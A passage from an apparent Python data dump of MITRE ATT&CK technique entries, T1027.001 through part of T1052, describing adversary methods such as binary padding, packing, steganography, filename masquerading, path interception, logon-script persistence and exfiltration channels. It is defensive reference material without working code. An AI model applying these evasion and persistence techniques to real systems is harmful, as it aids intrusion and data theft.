                              'representation of malware. This can be done without affecting the functionality or '
                              'behavior of a binary, but can increase the size of the binary beyond what some security '
                              'tools are capable of handling due to file size limitations. \n'
                              '\n'
                              'Binary padding effectively changes the checksum of the file and can also be used to '
                              'avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET '
                              'OceanLotus) The padding used is commonly generated by a function to create junk data '
                              'and then appended to the end or applied to sections of malware.(Citation: Securelist '
                              'Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of '
                              'certain tools and detection capabilities that are not designed or configured to scan '
                              'large files. This may also reduce the likelihood of being collected for analysis. '
                              'Public file scanning services, such as VirusTotal, limits the maximum size of an '
                              'uploaded file to be analyzed.(Citation: VirusTotal FAQ) ',
               'name': 'Binary Padding',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.002': {'attack_id': 'T1027.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may perform software packing or virtual machine software protection to '
                              'conceal their code. Software packing is a method of compressing or encrypting an '
                              'executable. Packing an executable changes the file signature in an attempt to avoid '
                              'signature-based detection. Most decompression techniques decompress the executable code '
                              "in memory. Virtual machine software protection translates an executable's original code "
                              'into a special format that only a special virtual machine can run. A virtual machine is '
                              'then called to run this code.(Citation: ESET FinFisher Jan 2018) \n'
                              '\n'
                              'Utilities used to perform software packing are called packers. Example packers are '
                              'MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: '
                              'Wikipedia Exe Compression) but adversaries may create their own packing techniques that '
                              'do not leave the same artifacts as well-known packers to evade defenses.  ',
               'name': 'Software Packing',
               'platforms': ['macOS', 'Windows']},
 'T1027.003': {'attack_id': 'T1027.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use steganography techniques in order to prevent the detection of '
                              'hidden information. Steganographic techniques can be used to hide data in digital media '
                              'such as images, audio tracks, video clips, or text files.\n'
                              '\n'
                              '[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that '
                              "used steganography. It encrypted the gathered information from a victim's system and "
                              'hid it within an image before exfiltrating the image to a C2 server.(Citation: '
                              'Wikipedia Duqu) \n'
                              '\n'
                              'By the end of 2017, a threat group used\u202f<code>Invoke-PSImage</code>\u202fto hide '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file '
                              "(.png) and execute the code on a victim's system. In this particular case the "
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another '
                              "obfuscated script to gather intelligence from the victim's machine and communicate it "
                              'back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  ',
               'name': 'Steganography',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.004': {'attack_id': 'T1027.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may attempt to make payloads difficult to discover and analyze by '
                              'delivering files to victims as uncompiled code. Text-based source code files may '
                              'subvert analysis and scrutiny from protections targeting executables/binaries. These '
                              'payloads will need to be compiled before execution; typically via native utilities such '
                              'as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n'
                              '\n'
                              'Source code payloads may also be encrypted, encoded, and/or embedded within other '
                              'files, such as those delivered as a '
                              '[Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered '
                              'in formats unrecognizable and inherently benign to the native OS (ex: EXEs on '
                              'macOS/Linux) before later being (re)compiled into a proper executable binary with a '
                              'bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)',
               'name': 'Compile After Delivery',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.005': {'attack_id': 'T1027.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may remove indicators from tools if they believe their malicious tool was '
                              'detected, quarantined, or otherwise curtailed. They can modify the tool by removing the '
                              "indicator and using the updated version that is no longer detected by the target's "
                              'defensive systems or subsequent targets that may use similar systems.\n'
                              '\n'
                              'A good example of this is when malware is detected with a file signature and '
                              'quarantined by anti-virus software. An adversary who can determine that the malware was '
                              'quarantined because of its file signature may modify the file to explicitly avoid that '
                              'signature, and then re-use the malware.',
               'name': 'Indicator Removal from Tools',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1029': {'attack_id': 'T1029',
           'categories': ['exfiltration'],
           'description': 'Adversaries may schedule data exfiltration to be performed only at certain times of day or '
                          'at certain intervals. This could be done to blend traffic patterns with normal activity or '
                          'availability.\n'
                          '\n'
                          'When scheduled exfiltration is used, other exfiltration techniques likely apply as well to '
                          'transfer the information out of the network, such as [Exfiltration Over C2 '
                          'Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative '
                          'Protocol](https://attack.mitre.org/techniques/T1048).',
           'name': 'Scheduled Transfer',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1030': {'attack_id': 'T1030',
           'categories': ['exfiltration'],
           'description': 'An adversary may exfiltrate data in fixed size chunks instead of whole files or limit '
                          'packet sizes below certain thresholds. This approach may be used to avoid triggering '
                          'network data transfer threshold alerts.',
           'name': 'Data Transfer Size Limits',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1033': {'attack_id': 'T1033',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to identify the primary user, currently logged in user, set of '
                          'users that commonly uses a system, or whether a user is actively using the system. They may '
                          'do this, for example, by retrieving account usernames or by using [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a '
                          'number of different ways using other Discovery techniques, because user and username '
                          'details are prevalent throughout a system and include running process ownership, '
                          'file/directory ownership, session information, and system logs. Adversaries may use the '
                          'information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) '
                          'during automated discovery to shape follow-on behaviors, including whether or not the '
                          'adversary fully infects the target and/or attempts specific actions.\n'
                          '\n'
                          'Utilities and commands that acquire this information include <code>whoami</code>. In Mac '
                          'and Linux, the currently logged in user can be identified with <code>w</code> and '
                          '<code>who</code>.',
           'name': 'System Owner/User Discovery',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1034': {'attack_id': 'T1034',
           'categories': ['persistence', 'privilege-escalation'],
           'description': '**This technique has been deprecated. Please use [Path Interception by PATH Environment '
                          'Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search '
                          'Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception '
                          'by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n'
                          '\n'
                          'Path interception occurs when an executable is placed in a specific path so that it is '
                          'executed by an application instead of the intended target. One example of this was the use '
                          'of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working '
                          'directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess '
                          'function. (Citation: TechNet MS14-019)\n'
                          '\n'
                          'There are multiple distinct weaknesses or misconfigurations that adversaries may take '
                          'advantage of when performing path interception: unquoted paths, path environment variable '
                          'misconfigurations, and search order hijacking. The first vulnerability deals with full '
                          'program paths, while the second and third occur when program paths are not specified. These '
                          'techniques can be used for persistence if executables are called on a regular basis, as '
                          'well as privilege escalation if intercepted executables are started by a higher privileged '
                          'process.\n'
                          '\n'
                          '### Unquoted Paths\n'
                          'Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut '
                          'paths are vulnerable to path interception if the path has one or more spaces and is not '
                          'surrounded by quotation marks (e.g., <code>C:\\unsafe path with space\\program.exe</code> '
                          'vs. <code>"C:\\safe path with space\\program.exe"</code>). (Citation: Baggett 2012) An '
                          'adversary can place an executable in a higher level directory of the path, and Windows will '
                          'resolve that executable instead of the intended executable. For example, if the path in a '
                          'shortcut is <code>C:\\program files\\myapp.exe</code>, an adversary may create a program at '
                          '<code>C:\\program.exe</code> that will be run instead of the intended program. (Citation: '
                          'SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan '
                          '2018)\n'
                          '\n'
                          '### PATH Environment Variable Misconfiguration\n'
                          'The PATH environment variable contains a list of directories. Certain methods of executing '
                          'a program (namely using cmd.exe or the command-line) rely solely on the PATH environment '
                          'variable to determine the locations that are searched for a program when the path for the '
                          'program is not given. If any directories are listed in the PATH environment variable before '
                          'the Windows directory, <code>%SystemRoot%\\system32</code> (e.g., '
                          '<code>C:\\Windows\\system32</code>), a program may be placed in the preceding directory '
                          'that is named the same as a Windows program (such as cmd, PowerShell, or Python), which '
                          'will be executed when that command is executed from a script or command-line.\n'
                          '\n'
                          'For example, if <code>C:\\example path</code> precedes <code>C:\\Windows\\system32</code> '
                          'is in the PATH environment variable, a program that is named net.exe and placed in '
                          '<code>C:\\example path</code> will be called instead of the Windows system "net" when "net" '
                          'is executed from the command-line.\n'
                          '\n'
                          '### Search Order Hijacking\n'
                          'Search order hijacking occurs when an adversary abuses the order in which Windows searches '
                          'for programs that are not given a path. The search order differs depending on the method '
                          'that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT '
                          'Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the '
                          'directory of the initiating program before searching through the Windows system directory. '
                          'An adversary who finds a program vulnerable to search order hijacking (i.e., a program that '
                          'does not specify the path to an executable) may take advantage of this vulnerability by '
                          'creating a program named after the improperly specified program and placing it within the '
                          "initiating program's directory.\n"
                          '\n'
                          'For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net '
                          'user</code>. An adversary may place a program called "net.exe" within the same directory as '
                          'example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, '
                          'if an adversary places a program called "net.com" in the same directory as "net.exe", then '
                          '<code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the '
                          'order of executable extensions defined under PATHEXT. (Citation: MSDN Environment '
                          'Property)\n'
                          '\n'
                          'Search order hijacking is also a common practice for hijacking DLL loads and is covered in '
                          '[DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).',
           'name': 'Path Interception',
           'platforms': ['Windows']},
 'T1036': {'attack_id': 'T1036',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may attempt to manipulate features of their artifacts to make them appear '
                          'legitimate or benign to users and/or security tools. Masquerading occurs when the name or '
                          'location of an object, legitimate or malicious, is manipulated or abused for the sake of '
                          'evading defenses and observation. This may include manipulating file metadata, tricking '
                          'users into misidentifying the file type, and giving legitimate task or service names.\n'
                          '\n'
                          'Renaming abusable system utilities to evade security monitoring is also a form of '
                          '[Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)',
           'name': 'Masquerading',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1036.001': {'attack_id': 'T1036.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may attempt to mimic features of valid code signatures to increase the '
                              'chance of deceiving a user, analyst, or tool. Code signing provides a level of '
                              'authenticity on a binary from the developer and a guarantee that the binary has not '
                              'been tampered with. Adversaries can copy the metadata and signature information from a '
                              'signed program, then use it as a template for an unsigned program. Files with invalid '
                              'code signatures will fail digital signature validation checks, but they may appear more '
                              'legitimate to users and security tools may improperly handle these files.(Citation: '
                              'Threatexpress MetaTwin 2017)\n'
                              '\n'
                              'Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity '
                              'will not result in a valid signature.',
               'name': 'Invalid Code Signature',
               'platforms': ['macOS', 'Windows']},
 'T1036.002': {'attack_id': 'T1036.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a '
                              'means of tricking a user into executing what they think is a benign file type but is '
                              'actually executable code. RTLO is a non-printing character that causes the text that '
                              'follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For '
                              'example, a Windows screensaver executable named <code>March 25 \\u202Excod.scr</code> '
                              'will display as <code>March 25 rcs.docx</code>. A JavaScript file named '
                              '<code>photo_high_re\\u202Egnp.js</code> will be displayed as '
                              '<code>photo_high_resj.png</code>.\n'
                              '\n'
                              'A common use of this technique is with [Spearphishing '
                              'Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious '
                              'File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users '
                              'and defenders if they are not aware of how their tools display and render the RTLO '
                              'character. Use of the RTLO character has been seen in many targeted intrusion attempts '
                              'and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber '
                              'Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the '
                              'reversed characters but the command line tool reg.exe does not by default.',
               'name': 'Right-to-Left Override',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1036.003': {'attack_id': 'T1036.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may rename legitimate system utilities to try to evade security mechanisms '
                              'concerning the usage of those utilities. Security monitoring and control mechanisms may '
                              'be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS '
                              'Main Site) It may be possible to bypass those security mechanisms by renaming the '
                              'utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Endgame '
                              'Masquerade Ball) An alternative case occurs when a legitimate utility is copied or '
                              'moved to a different directory and renamed to avoid detections based on system '
                              'utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)',
               'name': 'Rename System Utilities',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1036.004': {'attack_id': 'T1036.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may attempt to manipulate the name of a task or service to make it appear '
                              'legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will '
                              'typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: '
                              'Systemd Service Units) Windows services will have a service name as well as a display '
                              'name. Many benign tasks and services exist that have commonly associated names. '
                              'Adversaries may give tasks or services names that are similar or identical to those of '
                              'legitimate ones.\n'
                              '\n'
                              'Tasks or services contain other fields, such as a description, that adversaries may '
                              'attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: '
                              'Fysbis Dr Web Analysis)',
               'name': 'Masquerade Task or Service',
               'platforms': ['Windows', 'Linux']},
 'T1036.005': {'attack_id': 'T1036.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may match or approximate the name or location of legitimate files when '
                              'naming/placing their files. This is done for the sake of evading defenses and '
                              'observation. This may be done by placing an executable in a commonly trusted directory '
                              '(ex: under System32) or giving it the name of a legitimate, trusted program (ex: '
                              'svchost.exe). Alternatively, the filename given may be a close approximation of '
                              'legitimate programs or something innocuous.\n'
                              '\n'
                              'Adversaries may also use the same icon of the file they are trying to mimic.',
               'name': 'Match Legitimate Name or Location',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1036.006': {'attack_id': 'T1036.006',
               'categories': ['defense-evasion'],
               'description': "Adversaries can hide a program's true filetype by changing the extension of a file. "
                              'With certain file types (specifically this does not work with .app extensions), '
                              'appending a space to the end of a filename will change how the file is processed by the '
                              'operating system.\n'
                              '\n'
                              'For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it '
                              'is double clicked by a user, it will launch Terminal.app and execute. If this file is '
                              'renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch '
                              'with the default text editing application (not executing the binary). However, if the '
                              'file is renamed to <code>evil.txt </code> (note the space at the end), then when double '
                              'clicked by a user, the true file type is determined by the OS and handled appropriately '
                              'and the binary will be executed (Citation: Mac Backdoors are back).\n'
                              '\n'
                              'Adversaries can use this feature to trick users into double clicking benign-looking '
                              'files of any format and ultimately executing something malicious.',
               'name': 'Space after Filename',
               'platforms': ['Linux', 'macOS']},
 'T1037': {'attack_id': 'T1037',
           'categories': ['persistence', 'privilege-escalation'],
           'description': 'Adversaries may use scripts automatically executed at boot or logon initialization to '
                          'establish persistence. Initialization scripts can be used to perform administrative '
                          'functions, which may often execute other programs or send information to an internal '
                          'logging server. These scripts can vary based on operating system and whether applied '
                          'locally or remotely.  \n'
                          '\n'
                          'Adversaries may use these scripts to maintain persistence on a single system. Depending on '
                          'the access configuration of the logon scripts, either local credentials or an administrator '
                          'account may be necessary. \n'
                          '\n'
                          'An adversary may also be able to escalate their privileges since some boot or logon '
                          'initialization scripts run with higher privileges.',
           'name': 'Boot or Logon Initialization Scripts',
           'platforms': ['macOS', 'Windows', 'Linux']},
 'T1037.001': {'attack_id': 'T1037.001',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use Windows logon scripts automatically executed at logon '
                              'initialization to establish persistence. Windows allows logon scripts to be run '
                              'whenever a specific user or group of users log into a system.(Citation: TechNet Logon '
                              'Scripts) This is done via adding a path to a script to the '
                              '<code>HKCU\\Environment\\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn '
                              'Logon Scripts)\n'
                              '\n'
                              'Adversaries may use these scripts to maintain persistence on a single system. Depending '
                              'on the access configuration of the logon scripts, either local credentials or an '
                              'administrator account may be necessary. ',
               'name': 'Logon Script (Windows)',
               'platforms': ['Windows']},
 'T1037.002': {'attack_id': 'T1037.002',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use macOS logon scripts automatically executed at logon initialization '
                              'to establish persistence. macOS allows logon scripts (known as login hooks) to be '
                              'executed whenever a specific user logs into a system. A login hook tells Mac OS X to '
                              'execute a certain script when a user logs in, but unlike [Startup '
                              'Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the '
                              'elevated root user.(Citation: creating login hook)\n'
                              '\n'
                              'Adversaries may use these login hooks to maintain persistence on a single '
                              'system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an '
                              'adversary to insert additional malicious code. There can only be one login hook at a '
                              'time though and depending on the access configuration of the hooks, either local '
                              'credentials or an administrator account may be necessary. ',
               'name': 'Logon Script (Mac)',
               'platforms': ['macOS']},
 'T1037.003': {'attack_id': 'T1037.003',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use network logon scripts automatically executed at logon '
                              'initialization to establish persistence. Network logon scripts can be assigned using '
                              'Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon '
                              'scripts run with the privileges of the user they are assigned to. Depending on the '
                              'systems within the network, initializing one of these scripts could apply to more than '
                              'one or potentially all systems.  \n'
                              ' \n'
                              'Adversaries may use these scripts to maintain persistence on a network. Depending on '
                              'the access configuration of the logon scripts, either local credentials or an '
                              'administrator account may be necessary.',
               'name': 'Network Logon Script',
               'platforms': ['Windows']},
 'T1037.004': {'attack_id': 'T1037.004',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use rc.common automatically executed at boot initialization to '
                              'establish persistence. During the boot process, macOS executes <code>source '
                              '/etc/rc.common</code>, which is a shell script containing various utility functions. '
                              'This file also defines routines for processing command-line arguments and for gathering '
                              'system settings and is thus recommended to include in the start of Startup Item Scripts '
                              '(Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in '
                              'favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used.\n'
                              '\n'
                              'Adversaries can use the rc.common file as a way to hide code for persistence that will '
                              'execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence)',
               'name': 'Rc.common',
               'platforms': ['macOS']},
 'T1037.005': {'attack_id': 'T1037.005',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use startup items automatically executed at boot initialization to '
                              'establish persistence. Startup items execute during the final phase of the boot process '
                              'and contain shell scripts or other executable files along with configuration '
                              'information used by the system to determine the execution order for all startup items. '
                              '(Citation: Startup Items)\n'
                              '\n'
                              'This is technically a deprecated technology (superseded by [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate '
                              'folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by '
                              'default, but does appear to exist by default on macOS Sierra. A startup item is a '
                              'directory whose executable and configuration property list (plist), '
                              '<code>StartupParameters.plist</code>, reside in the top-level directory. \n'
                              '\n'
                              'An adversary can create the appropriate folders/files in the StartupItems directory to '
                              'register their own persistence mechanism (Citation: Methods of Mac Malware '
                              'Persistence). Additionally, since StartupItems run during the bootup phase of macOS, '
                              'they will run as the elevated root user.',
               'name': 'Startup Items',
               'platforms': ['macOS']},
 'T1039': {'attack_id': 'T1039',
           'categories': ['collection'],
           'description': 'Adversaries may search network shares on computers they have compromised to find files of '
                          'interest. Sensitive data can be collected from remote systems via shared network drives '
                          '(host shared directory, network file server, etc.) that are accessible from the current '
                          'system prior to Exfiltration. Interactive command shells may be in use, and common '
                          'functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather '
                          'information.',
           'name': 'Data from Network Shared Drive',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1040': {'attack_id': 'T1040',
           'categories': ['credential-access', 'discovery'],
           'description': 'Adversaries may sniff network traffic to capture information about an environment, '
                          'including authentication material passed over the network. Network sniffing refers to using '
                          'the network interface on a system to monitor or capture information sent over a wired or '
                          'wireless connection. An adversary may place a network interface into promiscuous mode to '
                          'passively access data in transit over the network, or use span ports to capture a larger '
                          'amount of data.\n'
                          '\n'
                          'Data captured via this technique may include user credentials, especially those sent over '
                          'an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such '
                          'as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), '
                          'can also be used to capture credentials to websites, proxies, and internal systems by '
                          'redirecting traffic to an adversary.\n'
                          '\n'
                          'Network sniffing may also reveal configuration details, such as running services, version '
                          'numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) '
                          'necessary for subsequent Lateral Movement and/or Defense Evasion activities.',
           'name': 'Network Sniffing',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1041': {'attack_id': 'T1041',
           'categories': ['exfiltration'],
           'description': 'Adversaries may steal data by exfiltrating it over an existing command and control channel. '
                          'Stolen data is encoded into the normal communications channel using the same protocol as '
                          'command and control communications.',
           'name': 'Exfiltration Over C2 Channel',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1043': {'attack_id': 'T1043',
           'categories': ['command-and-control'],
           'description': '**This technique has been deprecated. Please use [Non-Standard '
                          'Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n'
                          '\n'
                          'Adversaries may communicate over a commonly used port to bypass firewalls or network '
                          'detection systems and to blend with normal network activity to avoid more detailed '
                          'inspection. They may use commonly open ports such as\n'
                          '\n'
                          '* TCP:80 (HTTP)\n'
                          '* TCP:443 (HTTPS)\n'
                          '* TCP:25 (SMTP)\n'
                          '* TCP/UDP:53 (DNS)\n'
                          '\n'
                          'They may use the protocol associated with the port or a completely different protocol. \n'
                          '\n'
                          'For connections that occur internally within an enclave (such as those between a proxy or '
                          'pivot node and other nodes), examples of common ports are \n'
                          '\n'
                          '* TCP/UDP:135 (RPC)\n'
                          '* TCP/UDP:22 (SSH)\n'
                          '* TCP/UDP:3389 (RDP)',
           'name': 'Commonly Used Port',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1046': {'attack_id': 'T1046',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of services running on remote hosts, including '
                          'those that may be vulnerable to remote software exploitation. Methods to acquire this '
                          'information include port scans and vulnerability scans using tools that are brought onto a '
                          'system. \n'
                          '\n'
                          'Within cloud environments, adversaries may attempt to discover services running on other '
                          'cloud hosts. Additionally, if the cloud environment is connected to a on-premises '
                          'environment, adversaries may be able to identify services running on non-cloud systems as '
                          'well.',
           'name': 'Network Service Scanning',
           'platforms': ['Linux', 'Windows', 'macOS', 'AWS', 'GCP', 'Azure']},
 'T1047': {'attack_id': 'T1047',
           'categories': ['execution'],
           'description': 'Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is '
                          'a Windows administration feature that provides a uniform environment for local and remote '
                          'access to Windows system components. It relies on the WMI service for local and remote '
                          'access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure '
                          'Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. '
                          '(Citation: MSDN WMI)\n'
                          '\n'
                          'An adversary can use WMI to interact with local and remote systems and use it as a means to '
                          'perform many tactic functions, such as gathering information for Discovery and remote '
                          'Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) '
                          '(Citation: FireEye WMI 2015)',
           'name': 'Windows Management Instrumentation',
           'platforms': ['Windows']},
 'T1048': {'attack_id': 'T1048',
           'categories': ['exfiltration'],
           'description': 'Adversaries may steal data by exfiltrating it over a different protocol than that of the '
                          'existing command and control channel. The data may also be sent to an alternate network '
                          'location from the main command and control server.  \n'
                          '\n'
                          'Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not '
                          'being used as the main command and control channel. Different protocol channels could also '
                          'include Web services such as cloud storage. Adversaries may also opt to encrypt and/or '
                          'obfuscate these alternate channels. \n'
                          '\n'
                          '[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be '
                          'done using various common operating system utilities such as '
                          '[Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct '
                          '2016) ',
           'name': 'Exfiltration Over Alternative Protocol',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1048.001': {'attack_id': 'T1048.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may steal data by exfiltrating it over a symmetrically encrypted network '
                              'protocol other than that of the existing command and control channel. The data may also '
                              'be sent to an alternate network location from the main command and control server. \n'
                              '\n'
                              'Symmetric encryption algorithms are those that use shared or the same keys/secrets on '
                              'each end of the channel. This requires an exchange or pre-arranged agreement/possession '
                              'of the value used to encrypt and decrypt data. \n'
                              '\n'
                              'Network protocols that use asymmetric encryption often utilize symmetric encryption '
                              'once keys are exchanged, but adversaries may opt to manually share keys and implement '
                              'symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked '
                              'into a protocol. This may result in multiple layers of encryption (in protocols that '
                              'are natively encrypted such as HTTPS) or encryption in protocols that not typically '
                              'encrypted (such as HTTP or FTP). ',
               'name': 'Exfiltration Over Symmetric Encrypted Non-C2 Protocol',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1048.002': {'attack_id': 'T1048.002',
               'categories': ['exfiltration'],
               'description': 'Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network '
                              'protocol other than that of the existing command and control channel. The data may also '
                              'be sent to an alternate network location from the main command and control server. \n'
                              '\n'
                              'Asymmetric encryption algorithms are those that use different keys on each end of the '
                              'channel. Also known as public-key cryptography, this requires pairs of cryptographic '
                              'keys that can encrypt/decrypt data from the corresponding key. Each end of the '
                              'communication channels requires a private key (only in the procession of that entity) '
                              'and the public key of the other entity. The public keys of each entity are exchanged '
                              'before encrypted communications begin. \n'
                              '\n'
                              'Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize '
                              'symmetric encryption once keys are exchanged. Adversaries may opt to use these '
                              'encrypted mechanisms that are baked into a protocol. ',
               'name': 'Exfiltration Over Asymmetric Encrypted Non-C2 Protocol',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1048.003': {'attack_id': 'T1048.003',
               'categories': ['exfiltration'],
               'description': 'Adversaries may steal data by exfiltrating it over an un-encrypted network protocol '
                              'other than that of the existing command and control channel. The data may also be sent '
                              'to an alternate network location from the main command and control server. \n'
                              '\n'
                              'Adversaries may opt to obfuscate this data, without the use of encryption, within '
                              'network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may '
                              'include custom or publicly available encoding/compression algorithms (such as base64) '
                              'as well as embedding data within protocol headers and fields. ',
               'name': 'Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1049': {'attack_id': 'T1049',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of network connections to or from the compromised '
                          'system they are currently accessing or from remote systems by querying for information over '
                          'the network. \n'
                          '\n'
                          'An adversary who gains access to a system that is part of a cloud-based environment may map '
                          'out Virtual Private Clouds or Virtual Networks in order to determine what systems and '
                          'services are connected. The actions performed are likely the same types of discovery '
                          'techniques depending on the operating system, but the resulting information may include '
                          "details about the networked cloud environment relevant to the adversary's goals. Cloud "
                          'providers may have different ways in which their virtual networks operate.(Citation: Amazon '
                          'AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC '
                          'Overview)\n'
                          '\n'
                          'Utilities and commands that acquire this information include '
                          '[netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with '
                          '[Net](https://attack.mitre.org/software/S0039). In Mac and Linux, '
                          '[netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to '
                          'list current connections. <code>who -a</code> and <code>w</code> can be used to show which '
                          'users are currently logged in, similar to "net session".',
           'name': 'System Network Connections Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1051': {'attack_id': 'T1051',
           'categories': ['lateral-movement'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'Adversaries may add malicious content to an internally accessible website through an open '
                          "network file share that contains the website's webroot or Web content directory (Citation: "
                          'Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content '
                          'with a Web browser to cause the server to execute the malicious content. The malicious '
                          'content will typically run under the context and permissions of the Web server process, '
                          'often resulting in local system or administrative privileges, depending on how the Web '
                          'server is configured.\n'
                          '\n'
                          'This mechanism of shared access and remote execution could be used for lateral movement to '
                          'the system running the Web server. For example, a Web server running PHP with an open '
                          'network share could allow an adversary to upload a remote access tool and PHP script to '
                          'execute the RAT on the system running the Web server when a specific page is visited. '
                          '(Citation: Webroot PHP 2011)',
           'name': 'Shared Webroot',
           'platforms': ['Windows']},
 'T1052': {'attack_id': 'T1052',
           'categories': ['exfiltration'],
           'description': 'Adversaries may attempt to exfiltrate data via a physical medium, such as a removable '
                          'drive. In certain circumstances, such as an air-gapped network compromise, exfiltration '
                          'could occur via a physical medium or device introduced by a user. Such media could be an '
